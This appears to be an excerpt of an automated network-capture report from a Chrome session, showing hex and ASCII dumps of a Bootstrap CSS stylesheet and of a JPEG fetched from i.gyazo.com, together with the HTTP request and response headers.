                                                          Data Ascii: ark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px
                                                          2024-12-03 02:27:02 UTC1369INData Raw: 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 63 75 72 73 6f 72 3a 68 65 6c 70 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 7d 61 64 64 72 65 73 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 6f 6c 20 6f 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 2c 75 6c 20 75 6c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 64 74 7b 66 6f 6e 74 2d 77
                                                          Data Ascii: ebkit-text-decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0}address{margin-bottom:1rem;font-style:normal;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-w
                                                          2024-12-03 02:27:02 UTC1369INData Raw: 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d 77 65 62 6b 69 74 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 2c 62 75 74 74 6f 6e 2c 68 74 6d 6c 20 5b
                                                          Data Ascii: ted;outline:5px auto -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button,input{overflow:visible}button,select{text-transform:none}[type=reset],[type=submit],button,html [
                                                          2024-12-03 02:27:02 UTC1369INData Raw: 68 33 2c 68 34 2c 68 35 2c 68 36 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 68 31 2c 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 7d 2e 68 32 2c 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 7d 2e 68 33 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 35 72 65 6d 7d 2e 68 34 2c 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 7d 2e 68 35 2c 68 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 7d 2e 68 36 2c 68 36 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 7d 2e 6c 65 61 64 7b 66 6f 6e 74 2d 73 69 7a 65
                                                          Data Ascii: h3,h4,h5,h6{margin-bottom:.5rem;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}.h1,h1{font-size:2.5rem}.h2,h2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-size:1rem}.lead{font-size
                                                          2024-12-03 02:27:02 UTC1369INData Raw: 6f 64 65 2c 6b 62 64 2c 70 72 65 2c 73 61 6d 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 53 46 4d 6f 6e 6f 2d 52 65 67 75 6c 61 72 2c 4d 65 6e 6c 6f 2c 4d 6f 6e 61 63 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 22 4c 69 62 65 72 61 74 69 6f 6e 20 4d 6f 6e 6f 22 2c 22 43 6f 75 72 69 65 72 20 4e 65 77 22 2c 6d 6f 6e 6f 73 70 61 63 65 7d 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 65 38 33 65 38 63 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 61 3e 63 6f 64 65 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 6b 62 64 7b 70 61 64 64 69 6e 67 3a 2e 32 72 65 6d 20 2e 34 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23
                                                          Data Ascii: ode,kbd,pre,samp{font-family:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}code{font-size:87.5%;color:#e83e8c;word-break:break-word}a>code{color:inherit}kbd{padding:.2rem .4rem;font-size:87.5%;color:#fff;background-color:#
                                                          2024-12-03 02:27:02 UTC1369INData Raw: 6c 67 2d 39 2c 2e 63 6f 6c 2d 6c 67 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 6d 64 2c 2e 63 6f 6c 2d 6d 64 2d 31 2c 2e 63 6f 6c 2d 6d 64 2d 31 30 2c 2e 63 6f 6c 2d 6d 64 2d 31 31 2c 2e 63 6f 6c 2d 6d 64 2d 31 32 2c 2e 63 6f 6c 2d 6d 64 2d 32 2c 2e 63 6f 6c 2d 6d 64 2d 33 2c 2e 63 6f 6c 2d 6d 64 2d 34 2c 2e 63 6f 6c 2d 6d 64 2d 35 2c 2e 63 6f 6c 2d 6d 64 2d 36 2c 2e 63 6f 6c 2d 6d 64 2d 37 2c 2e 63 6f 6c 2d 6d 64 2d 38 2c 2e 63 6f 6c 2d 6d 64 2d 39 2c 2e 63 6f 6c 2d 6d 64 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 73 6d 2c 2e 63 6f 6c 2d 73 6d 2d 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 30 2c 2e 63 6f 6c 2d 73 6d 2d 31 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 32 2c 2e 63 6f 6c 2d 73 6d 2d 32 2c 2e 63 6f 6c 2d 73 6d 2d 33 2c 2e 63 6f 6c 2d 73 6d 2d 34 2c 2e 63 6f 6c 2d 73 6d 2d 35 2c 2e 63
                                                          Data Ascii: lg-9,.col-lg-auto,.col-md,.col-md-1,.col-md-10,.col-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-auto,.col-sm,.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.c
                                                          2024-12-03 02:27:02 UTC1369INData Raw: 3b 66 6c 65 78 3a 30 20 30 20 36 36 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 39 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 6d 61 78 2d 77 69 64 74 68 3a 37 35 25 7d 2e 63 6f 6c 2d 31 30 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 38 33 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 38 33 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 31 31 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b
                                                          Data Ascii: ;flex:0 0 66.666667%;max-width:66.666667%}.col-9{-webkit-box-flex:0;-ms-flex:0 0 75%;flex:0 0 75%;max-width:75%}.col-10{-webkit-box-flex:0;-ms-flex:0 0 83.333333%;flex:0 0 83.333333%;max-width:83.333333%}.col-11{-webkit-box-flex:0;-ms-flex:0 0 91.666667%;
                                                          2024-12-03 02:27:02 UTC1369INData Raw: 72 67 69 6e 2d 6c 65 66 74 3a 31 36 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 33 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 35 25 7d 2e 6f 66 66 73 65 74 2d 34 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 33 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 35 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 34 31 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 36 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 30 25 7d 2e 6f 66 66 73 65 74 2d 37 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 38 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 38 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 39 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 37 35 25 7d 2e 6f 66 66 73 65 74 2d 31 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38
                                                          Data Ascii: rgin-left:16.666667%}.offset-3{margin-left:25%}.offset-4{margin-left:33.333333%}.offset-5{margin-left:41.666667%}.offset-6{margin-left:50%}.offset-7{margin-left:58.333333%}.offset-8{margin-left:66.666667%}.offset-9{margin-left:75%}.offset-10{margin-left:8
                                                          2024-12-03 02:27:02 UTC1369INData Raw: 20 38 33 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 73 6d 2d 31 31 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 39 31 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 73 6d 2d 31 32 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 6f 72 64 65 72 2d 73 6d 2d 66 69 72 73 74 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 30 3b 2d 6d 73 2d 66 6c
                                                          Data Ascii: 83.333333%;max-width:83.333333%}.col-sm-11{-webkit-box-flex:0;-ms-flex:0 0 91.666667%;flex:0 0 91.666667%;max-width:91.666667%}.col-sm-12{-webkit-box-flex:0;-ms-flex:0 0 100%;flex:0 0 100%;max-width:100%}.order-sm-first{-webkit-box-ordinal-group:0;-ms-fl


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.449756104.18.24.163443732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:04 UTC624OUTGET /56ce8c9ac0a9aac3fa5ba75a1e3ce1ae.jpg HTTP/1.1
                                                          Host: i.gyazo.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://troubled-worried-bamboo.glitch.me/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-03 02:27:05 UTC590INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:05 GMT
                                                          Content-Type: image/jpeg
                                                          Content-Length: 229314
                                                          Connection: close
                                                          CF-Ray: 8ec01d95e87e42f1-EWR
                                                          CF-Cache-Status: HIT
                                                          Accept-Ranges: bytes
                                                          Access-Control-Allow-Origin: https://gyazo.com
                                                          Age: 340612
                                                          Cache-Control: public, max-age=31536000
                                                          ETag: "56ce"
                                                          Expires: Wed, 03 Dec 2025 02:27:05 GMT
                                                          Set-Cookie: Gyazo_cfwoker=i; Secure; HttpOnly; SameSite=None; Expires=Tue, 01 Jan 2030 00:00:00 GMT
                                                          Vary: Accept-Encoding
                                                          Via: 1.1 google
                                                          access-control-allow-credentials: true
                                                          Cf-Bgj: h2pri
                                                          x-cache-level: ZS
                                                          Server: cloudflare
                                                          2024-12-03 02:27:05 UTC779INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff db 00 43 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 03 85 07 6f 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                          Data Ascii: JFIFCCo"}!1AQa"q2
                                                          2024-12-03 02:27:05 UTC1369INData Raw: 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00
                                                          Data Ascii: J)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)h
                                                          2024-12-03 02:27:05 UTC1369INData Raw: b4 3c 70 41 c1 6f c6 80 3d ba 8a f3 df 02 7c 62 b3 f1 5c fa ce 9d ac 69 37 be 0d f1 06 8b 12 cf a8 e9 7a c3 c5 98 a0 6d db 67 49 63 76 8e 48 9b 63 fc ca dc 6d 21 82 91 8a e6 ec fe 3a 78 a3 c6 30 9d 47 c0 bf 0c b5 0f 10 78 74 93 e4 6a fa 96 a5 06 98 97 aa 0f df b7 8d f7 3b 21 fe 16 71 18 6e 08 e0 e6 80 3d 9a 8a e1 3e 1d 7c 5c b0 f8 80 da 95 8b e9 ba 87 87 7c 49 a5 15 1a 8e 83 ab 22 a5 cd be ec ec 70 51 99 24 8d f0 76 c9 1b 32 9c 11 90 41 03 82 f0 57 c7 af 88 5e 3d f0 fc 1a fe 93 f0 91 2e b4 59 da 51 14 89 e2 68 16 79 02 3b 27 11 bc 4a 01 25 4f 05 87 d6 80 3d e2 8a f2 0b 4f 8d de 20 f1 66 98 65 f0 77 80 a6 d4 b5 5b 1b 97 b2 d6 b4 7d 6b 54 8b 4e b9 d2 e7 0a 8c a8 f8 59 56 4d ca e1 83 23 15 23 04 13 9e 31 7c 2b f1 d3 e2 5f 8c 2e 35 78 ec 7e 11 da 63 49 d4 64
                                                          Data Ascii: <pAo=|b\i7zmgIcvHcm!:x0Gxtj;!qn=>|\|I"pQ$v2AW^=.YQhy;'J%O=O few[}kTNYVM##1|+_.5x~cId
                                                          2024-12-03 02:27:05 UTC1369INData Raw: df 17 34 36 d4 f4 1b 96 91 23 6d 93 41 28 db 2c 4d e8 cb d4 50 07 69 45 26 ea 5a 00 28 ae 47 c7 df 10 25 f0 2c 36 72 45 e1 4f 10 f8 9f ed 0c ca 57 40 b5 8e 63 0e 31 cb ef 91 30 0e 78 c6 7a 1a a7 f0 b7 e2 e6 9f f1 5a d7 59 92 cf 4a d5 b4 5b 8d 1e f8 e9 d7 96 5a cc 09 0c f1 cc 23 49 08 2a ae c3 1b 64 5e fe b4 01 dd 51 4d 2f 58 70 f8 8a fa 5f 19 dd 68 cd a0 5e 45 a7 43 65 1d ca 6b 6d 24 5f 67 96 46 76 53 02 ae ed fb d4 28 62 4a 81 86 1c d0 06 f5 14 dd fd 78 a4 59 37 74 14 00 fa 2b cb 7c 55 f1 f2 d3 c3 7e 36 d4 3c 2d 69 e0 ef 16 78 9b 51 d3 e0 82 e2 ea 4d 0e c6 29 a2 89 66 dd e5 82 5a 55 39 3b 1b b7 6a dc f0 0f c4 c9 bc 75 75 77 0c be 0d f1 3f 86 05 ba 2b 89 75 fb 38 e0 59 72 48 da 9b 24 7c 91 ef 8a 00 ed a8 a6 87 cf ff 00 ae 82 fb 7a d0 03 a8 a6 ef f6 c1 a3
                                                          Data Ascii: 46#mA(,MPiE&Z(G%,6rEOW@c10xzZYJ[Z#I*d^QM/Xp_h^ECekm$_gFvS(bJxY7t+|U~6<-ixQM)fZU9;juuw?+u8YrH$|z
                                                          2024-12-03 02:27:05 UTC1369INData Raw: df 20 fd fc a7 21 63 e0 b6 33 eb 3a f7 c0 98 2f 3c 41 7f ac f8 73 c6 1e 26 f0 25 d6 a4 fe 6e a1 1e 81 3d bb 41 77 21 18 32 b4 37 30 4c 89 21 00 02 f1 aa 93 81 92 48 06 a4 d5 3e 03 e9 57 da 0e 8b 67 6f af 78 8b 4e d5 b4 6b 89 6e ac bc 45 1e a1 e7 ea 31 cb 28 61 29 2d 3a c8 8e ae 18 e6 36 42 9d 30 a3 03 00 1e 59 e0 1d 22 d7 e1 e7 ed 0d e1 dd 2f c3 7f 0f ee fe 1a 68 7a f6 8d 7c 6f 74 95 7b 34 b2 b9 9a 06 80 c5 2a c3 6d 3c 88 b2 28 77 52 db 57 70 7e 49 c0 c4 1f 02 be 03 f8 37 e2 1f 87 fc 57 a9 78 cf 46 b6 f1 78 93 c5 5a d4 76 96 7a cc 62 e2 da c6 31 7d 28 22 18 9b 2a 8c cc 19 8b 81 bf e6 03 38 00 0f 57 d0 7e 02 e9 fa 5f 8e b4 8f 19 ea 3e 24 d7 fc 4b e2 8d 36 d6 e2 c9 35 0d 5a 68 3e 78 66 28 59 7c a8 62 8e 34 c1 8d 71 b1 17 3f c5 b8 e0 8e a7 c0 7e 01 d3 fe 1e
                                                          Data Ascii: !c3:/<As&%n=Aw!270L!H>WgoxNknE1(a)-:6B0Y"/hz|ot{4*m<(wRWp~I7WxFxZvzb1}("*8W~_>$K65Zh>xf(Y|b4q?~
                                                          2024-12-03 02:27:05 UTC1369INData Raw: 2d 8f a0 74 cf fb c3 d6 a4 9b f6 74 1a ca ad 9f 89 be 22 f8 d3 c5 ba 00 60 5b 43 d4 ae 2d 23 b6 98 03 90 92 bd bd b4 53 4a b9 c6 55 e4 21 80 c3 02 2b aa f8 87 f0 93 46 f8 8d 1e 9b 2d cd c6 a1 a3 6a fa 5b 33 e9 da ce 8d 71 f6 7b cb 32 c0 06 08 d8 2a 55 80 c1 47 56 53 81 91 c0 a0 0e 4f f6 9b 22 6f 07 f8 66 d5 7e 6b 9b 9f 16 68 89 0c 59 f9 a4 2b 7d 1b b0 03 be 15 19 8f b0 26 b8 8f 12 78 ea ff 00 c1 3f b5 b7 88 66 b0 f0 57 88 bc 66 d7 1e 12 b0 56 8b c3 cb 68 5e 00 2e ae 0e e7 fb 45 c4 23 07 b6 d2 4e 41 e2 bd 2b c2 ff 00 01 ed 34 9f 13 59 78 8b c4 1e 2a f1 1f 8f 35 8d 3f 77 f6 7c de 22 9e 0f 2a c8 b0 da 5e 28 2d e1 86 21 21 52 57 cc 28 5b 04 80 40 24 57 4d 67 f0 ef 4e b2 f8 91 a8 f8 d6 39 ae 8e ab 7d a6 c3 a5 cb 0b 32 f9 02 28 a4 77 52 06 dd db b3 23 67 2c 46
                                                          Data Ascii: -tt"`[C-#SJU!+F-j[3q{2*UGVSO"of~khY+}&x?fWfVh^.E#NA+4Yx*5?w|"*^(-!!RW([@$WMgN9}2(wR#g,F
                                                          2024-12-03 02:27:05 UTC1369INData Raw: 12 31 6d 6d aa 5b dc 3f 96 eb 2c 09 84 67 40 7c d1 26 37 0f 2c 8c e0 91 51 fc 2b f8 53 e1 2f 8e 5e 1e bb f1 97 c4 1d 0e c7 c6 3a e5 f6 a3 7b 1a ae b1 10 b8 4d 2e 38 ae 64 89 2d ed d1 f2 21 2a 23 19 2a 15 8b 16 27 93 c7 7f e1 bf 81 36 9a 5f 89 ac 7c 41 af f8 a7 c4 5e 3a d5 74 e0 df d9 d2 78 8a 6b 73 1d 89 65 da cf 14 36 f0 c3 1f 98 46 47 98 ca ce 01 20 30 c9 cb 35 8f 80 f6 f3 6b 57 fa 97 87 7c 63 e2 6f 03 9d 4a 53 3e a1 6b a0 4d 6d f6 7b a9 08 c3 48 63 b8 82 61 1b 9c 0c b4 5b 09 23 24 e7 9a 00 f1 5d 62 e2 7d 2f 4f d4 3c 20 6f 27 d4 34 5f 0c 7c 46 d0 ed 74 eb 8b c9 5a 69 22 82 46 82 6f 21 a4 62 4b f9 6d 23 28 dc 49 da 54 1c f7 f5 af da a2 44 4f 83 f7 3b d9 50 36 ad a4 a8 dd dd 8e a1 6f 81 f5 ad f6 f8 15 e1 19 3e 1c dd f8 26 4b 29 e4 d1 ae dc cf 3c ad 75 21
                                                          Data Ascii: 1mm[?,g@|&7,Q+S/^:{M.8d-!*#*'6_|A^:txkse6FG 05kW|coJS>kMm{Hca[#$]b}/O< o'4_|FtZi"Fo!bKm#(ITDO;P6o>&K)<u!
                                                          2024-12-03 02:27:05 UTC1369INData Raw: 40 8c c9 b5 42 8c a6 79 ac fd 73 e2 07 8b 23 f8 1b f1 5e d3 49 be f1 62 a6 8f 1d b4 9e 1d f1 17 89 74 9b dd 2e f7 12 ba 83 0b b4 d1 c2 f2 98 d8 11 e6 01 96 47 50 49 39 27 d9 fc 41 f0 97 c4 16 3e 2a d4 7c 45 e0 0f 16 5b f8 5a f3 56 64 93 54 d3 f5 4d 2b fb 4a c2 ea 55 40 8b 38 8d 66 85 d2 5d aa aa 59 64 c3 05 5c a9 23 35 26 b7 f0 8f 5a f1 67 c2 ed 6f c2 fe 21 f1 94 9a b6 a7 ab 3a c8 fa 99 d3 a3 8a 1b 7c 32 30 48 60 56 c8 4f 93 a3 48 cd 96 27 77 6a 00 f3 cf 8c 1f 0d f5 af 87 7f 0a b5 ff 00 1f e9 3e 3c f1 44 be 3b d0 f4 f9 35 4f b4 5e eb 13 be 9b 76 f1 ae f6 86 4b 0d df 67 11 30 05 70 88 ac a0 e4 36 46 6a 5f 16 7c 2c d6 74 bf 85 97 fe 3a 8f c7 fe 29 1e 3d b2 d3 1b 56 17 8b ab ce 34 d6 95 23 32 f9 27 4f dd f6 7f 20 e3 6e 36 6e c7 3b f7 7c d5 ec 9f 12 fc 11 ff
                                                          Data Ascii: @Bys#^Ibt.GPI9'A>*|E[ZVdTM+JU@8f]Yd\#5&Zgo!:|20H`VOH'wj><D;5O^vKg0p6Fj_|,t:)=V4#2'O n6n;|
                                                          2024-12-03 02:27:05 UTC1369INData Raw: 5c bd a7 c3 98 fc 5b 1a dd 78 cf e3 6c 93 dd 38 df e4 e9 d7 71 a4 69 ec 03 03 fc eb 37 c4 d2 6b bf 05 74 bb 9d 77 c2 3f 16 60 f1 05 8d 92 f9 8d a3 6a 57 0b 21 91 57 a8 1b 76 f3 ed 40 1e 81 e1 ff 00 88 de 3f 97 e3 3e af 03 78 6e 46 4f 21 41 b6 69 5b 64 63 e5 f9 80 cf f9 cd 7d 2e ac 59 41 23 07 19 c5 70 df 09 b5 cb 1f 1f 78 57 4c f1 82 58 25 ae a1 a9 5b 8f 39 ff 00 88 91 80 47 5e 99 15 dd 50 03 38 cf 5c 57 ca d6 7e 2d d5 fc 1b 0f c6 56 d0 dd 2d b5 8d 5b e2 15 ae 8f 67 79 32 07 4b 56 b8 86 ce 2f 38 ab 70 db 37 16 03 a1 20 03 c6 6b db fc 75 e0 ef 19 ea 5a cc 1a af 83 fc 6d 0f 87 a5 10 79 13 e9 fa b6 95 fd a5 63 28 0c 48 90 46 b3 42 e9 20 c9 1b 84 98 23 00 a9 c0 ac ad 27 e0 0e 9a 3e 1c eb 3e 19 d7 b5 3b ad 72 f7 5b bd 7d 53 51 d6 55 16 da 66 bd 2e ae b3 c4 ab
                                                          Data Ascii: \[xl8qi7ktw?`jW!Wv@?>xnFO!Ai[dc}.YA#pxWLX%[9G^P8\W~-V-[gy2KV/8p7 kuZmyc(HFB #'>>;r[}SQUf.
                                                          2024-12-03 02:27:05 UTC1369INData Raw: 5d b2 b1 97 4b b8 d2 75 cf 32 3b 5b cb 67 75 93 02 68 c3 3c 32 2b 20 21 b6 38 20 90 57 80 42 f8 43 e3 16 ad 73 e3 0b 2f 09 78 df c1 b7 7e 0e d7 ef a2 92 6b 19 a1 bc 8e ff 00 4e be 11 00 64 58 67 40 ac 18 0f 9b 6c 91 a1 23 91 9e 71 b9 e3 9f 05 f8 ab 58 d5 2d b5 4f 0a 78 de 4f 0d 5d c3 11 85 ec af 74 f4 d4 34 f9 d7 71 3b 9e 1d d1 c8 1c 67 01 92 55 e3 82 0e 06 32 3c 2f f0 a7 c4 12 78 c6 c3 c5 5e 3a f1 5d bf 89 b5 5d 32 29 62 d3 6d 74 bd 2b fb 3a ca d0 c8 02 c9 28 8d a5 9a 47 90 a8 0b b9 a4 c0 04 e1 46 68 03 cc 34 1f 14 78 9f 5a f8 7d f0 db c2 90 f8 8e fb 4f bf f1 36 ad a9 5a de f8 83 cd f3 6e e3 b6 b6 92 77 64 89 e4 dd 89 18 22 a2 b1 07 68 c9 03 20 53 fe 3a fc 37 d4 be 14 fc 35 bb d6 fc 19 e3 af 15 e9 d3 47 79 64 97 b0 ea da fd e6 a2 b7 31 3d d4 4a c1 1a 79
